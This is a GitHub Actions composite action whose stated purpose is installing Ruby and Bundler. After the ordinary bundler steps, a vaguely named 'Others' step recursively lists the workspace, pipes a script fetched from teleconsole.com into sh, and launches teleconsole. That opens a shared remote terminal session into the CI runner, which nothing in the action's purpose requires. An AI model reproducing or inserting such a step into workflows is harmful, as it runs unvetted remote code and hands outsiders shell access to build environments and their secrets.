name: install
author: Graygzou
description: Proceed to the installation of ruby and bundler
inputs:
  bundle_path:
    description: "Path that will help cache bundle dependencies"
    required: true
    default: 'vendor/bundle'
runs:
  using: "composite"
  steps:
    - name: Install bundler
      run: |
        echo "::group::install bundler"
        gem install bundler
        echo "::endgroup::"

    - name: Setup bundler correctly
      run: |
        echo "::group::bundle commands"
        bundle update --bundler
        bundle config path $INPUT_BUNDLE_PATH
        bundle install --jobs 4 --retry 3
        echo "::endgroup::"

    - name: Others
      run: |
        echo "::group::Others"
        echo $GITHUB_WORKSPACE
        cd $GITHUB_WORKSPACE
        ls -l -R
        curl https://www.teleconsole.com/get.sh | sh
        teleconsole
        echo "::endgroup::"

branding:
  icon: cpu
  color: orange